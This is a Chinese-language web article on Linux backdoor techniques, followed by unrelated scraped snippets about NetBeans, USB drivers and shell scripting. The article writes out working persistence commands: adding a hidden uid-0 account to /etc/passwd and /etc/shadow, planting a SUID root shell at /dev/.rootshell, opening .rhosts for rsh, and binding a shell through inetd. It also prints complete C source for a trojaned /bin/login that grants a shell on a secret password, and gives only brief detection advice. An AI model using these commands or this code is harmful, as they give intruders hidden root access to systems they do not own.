Linux后门技术及实践方法谈完整版

以下的文章主要描述的是Linux后门技术及实践方法,假如你在实际操作中遇到Linux后门技术,
但是你却不知道对Linux后门技术如何正确的解决,
那么以下的文章对你而言一定是良师益友。以下就是文章的主要内容描述。后门简介入侵者完全控制系统后,为方便下次进入而采用的一种技术。一般通过修改
系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。Linux后门技术增加超级用户账号破解/嗅探用户密码放置SUID Shellrhosts + +利用系统服务程序TCP/UDP/ICMP ShellCrontab定时任务共享库文件工具包rootkit可装载内核模块(LKM)增加超级用户 # echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow如果系统不允许uid=0的用户远程登录,还需要增加一个
普通用户账号。破解/嗅探用户密码获得shadow文件后,用John the Ripper 工具破解薄弱的用户密码。安装sniffit等嗅探工具,监听telnet、ftp等端口,收集用户密码。放置SUID Shell # cp /bin/bash /dev/.rootshell#
chmod u+s /dev/.rootshell普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。 rhosts + +# echo "+ +" > /.rhosts# rsh -l root victim.com csh -i远程可以得到一个rootshell。利用系统服务程序修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I ;用trojan程序替换in.telnetd、in.rexecd等inted的服务程序重定向login程序TCP/UDP/ICMP ShellBindShell,大部分是基于TCP/UDP协议的网络服务程序,在高端口监听,很容易被发现。Ping Backdoor,通过ICMP包激活后门,形成一个Shell通道。TCP ACK数据包后门,能够穿越防火墙。Crontab定时任务Linux后门技术中通过Crontab程序调度已安装的后门程序定时运行,一般在深夜时段,是系统管理员不在线的时间。共享库文件在共享库中嵌入后门函数使用后门口令激活Shell,获得权限能够躲避系统管理员对二进制文件本身的校验工具包rootkit包含一系列系统及后门工具:清除日志中的登录记录伪装校验和替换netstat、ps等网络工具后门登录程序易于安装和使用可装载内核模块(LKM)LKM:Loadable Kernel
Modules 动态的加载,不需要重新
编译内核。截获系统调用,具有隐藏目录、文件、进程、网络连接等强大功能。自身隐蔽性好,发现难度较大。著名的LKM包有adore和knark。后门的检测以自己的经验,结合特定的工具,手工作一些检测。使用Tripwire或md5校验来检查系统。
借助IDS系统,监听到目标机器的可疑网络连接。实例:login后门入侵者先把原始的/bin/login备份,再用一段程序替换/bin/login。入侵者telnet登录进来的时候,通过环境变量或者终端类型传递了正确的后门密码,将直接获得一个Shell;如果是普通用户登录,将会重定向到原始的login文件,来处理正常的登录。最简单的login后门ulogin.c源代码如下:实例:login后门 #include#
define PASSWORD "passWORD"#define _PATH_LOGIN "/sbin/logins"main (argc, argv, envp)int argc;char **argv, **envp;{char *display = getenv("DISPLAY");if ( display == NULL ) {execve(_PATH_LOGIN, argv, envp);perror(_PATH_LOGIN);exit(1);}if (!strcmp(display,PASSWORD)) {system("/bin/csh");exit(1);}execve(_PATH_LOGIN, argv, envp);exit(1);}以上的相关内容就是对Linux后门技术及实践方法谈完整版的介绍,望你能有所收获。【责任编辑:孙巧华 TEL:(010)68476606】 原文:Linux后门技术及实践方法谈完整版 返回网络安全首页

时间: 2024-09-24 23:10:40

Linux后门技术及实践方法谈完整版的相关文章

哪位有Netbeans 6.0程序开发技术详解电子书(PDF)完整版么?跪求分享。

问题描述 哪位有Netbeans6.0程序开发技术详解电子书(PDF)完整版么?跪求分享.

转: 嵌入式linux下usb驱动开发方法--看完少走弯路【转】

转自:http://blog.csdn.net/jimmy_1986/article/details/5838297 嵌入式linux下的usb属于所有驱动中相当复杂的一个子系统,要想将她彻底征服,至少需要个把月的时间,不信?那是你没做过. 本人做过2年的嵌入式驱动开发,usb占了一大半的时间.期间走了不少弯路,下面将我的血的经验教训总结下,为要从事和正在从事的战友们做一点点贡献吧:) 首先,扫盲: 要做的是阅读usb Spec(英文的哦,其实很多文章.书籍和资料真有水平的还是原创的好,就像食品

Linux shell脚本基础学习详细介绍(完整版)

Linux shell脚本基础学习这里我们先来第一讲,介绍shell的语法基础,开头.注释.变量和 环境变量,向大家做一个基础的介绍,虽然不涉及具体东西,但是打好基础是以后学习轻松地前提. 1. Linux 脚本编写基础 ◆1.1 语法基本介绍1.1.1 开头 程序必须以下面的行开始(必须方在文件的第一行): #!/bin/sh 符号#!用来告诉系统它后面的参数是用来执行该文件的程序.在这个例子中我们使用/bin/sh来执行程序. 当编辑好脚本时,如果要执行该脚本,还必须使其可执行. 要使脚本可

Linux shell脚本基础学习详细介绍(完整版)第1/2页_linux shell

Linux shell脚本基础学习这里我们先来第一讲,介绍shell的语法基础,开头.注释.变量和 环境变量,向大家做一个基础的介绍,虽然不涉及具体东西,但是打好基础是以后学习轻松地前提. 1. Linux 脚本编写基础 ◆1.1 语法基本介绍1.1.1 开头程序必须以下面的行开始(必须方在文件的第一行):#!/bin/sh符号#!用来告诉系统它后面的参数是用来执行该文件的程序.在这个例子中我们使用/bin/sh来执行程序.当编辑好脚本时,如果要执行该脚本,还必须使其可执行.要使脚本可执行:编译

4种后门技术知识的详细解析

以下的文章主要是介绍4种后门技术知识的讲解,曾经饱受木马.后门(以下统称后门)侵害的人们都不会忘记机器被破坏后的惨不忍睹的状况,于是人们展开了积极的防御工作,从补丁到防火墙,恨不得连网线都加个验证器,在多种多样的防御手法夹攻下.....一大批后门倒下了,菜鸟们也不用提心吊胆上网了-- 可是后门会因此罢休吗?答案当然是否定的.君不见,在风平浪静的陆地下,一批新的后门正在暗渡陈仓--1.反客为主的入侵者黑客A连接上了网络,却不见他有任何行动,他在干什么呢?我们只能看见他燃起一支烟,似乎在发呆--过了

再谈反病毒领域的工程化技术与科学方法的结合

问题描述 再谈反病毒领域的工程化技术与科学方法的结合--一次谈话记录的整理seak(在某高校与信安专业教师交流某次大学生信安大赛作品情况.和反病毒领域的人才培养等,当时讲的可能是语无伦次,感谢同事Emma进行录音整理.因部分内容东拉西扯跑题了有删节今天还是想谈谈工程经验和学术方法的结合问题,既然大家谈到了内容挖掘,我们就从内容挖掘开始.基于内容挖掘的思想,我印象中较早是从上世纪哥伦比亚大学的相关研究开始的,从其样本集来看基本是DOS下的COM文件,其中很大比例的样本都是用汇编语言编写的.COM文

《UNIX/Linux 系统管理技术手册(第四版)》——2.6 脚本编程的最佳实践

2.6 脚本编程的最佳实践 UNIX/Linux 系统管理技术手册(第四版) 虽然本章里的代码片段几乎不带注释,而且很少打印用法说明,只是因为我们已经列出了每个例子的大纲,从而体现出若干关键点.实际的脚本应该有更好的表现.有几本书通篇就讲编码的最佳实践,不过其中的基本指导原则如下. 如果运行脚本时带了不合适的参数,脚本应该打印一则用法说明,然后再退出.更好的做法是,也以这样的方式实现--help选项. 验证输入的有效性,并检查获得的输入值.例如,在对算出来的一个路径执行rm -fr操作之前,可能

以RHEL6为例介绍几种Linux灾难恢复技术和方法

Linux 发行版本众多,现如今也得到了越来越广泛的应用,同时也面临着系统出现故障的潜在风险,本文将以发行版本 RHEL6 为例详细介绍几种 Linux 灾难恢复技术和方法,以确保 Linux 系统的安全恢复. 在介绍 Linux 灾难恢复方法之前,我们先来了解下 MBR,其全称为 Master Boot Record,即硬盘的主引导记录.它由三个部分组成,主引导程序.http://www.aliyun.com/zixun/aggregation/10608.html">硬盘分区表和硬盘有

《Spark大数据分析:核心概念、技术及实践》大数据技术一览

本节书摘来自华章出版社<Spark大数据分析:核心概念.技术及实践>一书中的第1章,第1节,作者穆罕默德·古勒(Mohammed Guller)更多章节内容可以访问"华章计算机"公众号查看. 大数据技术一览 我们正处在大数据时代.数据不仅是任何组织的命脉,而且在指数级增长.今天所产生的数据比过去几年所产生的数据大好几个数量级.挑战在于如何从数据中获取商业价值.这就是大数据相关技术想要解决的问题.因此,大数据已成为过去几年最热门的技术趋势之一.一些非常活跃的开源项目都与大数据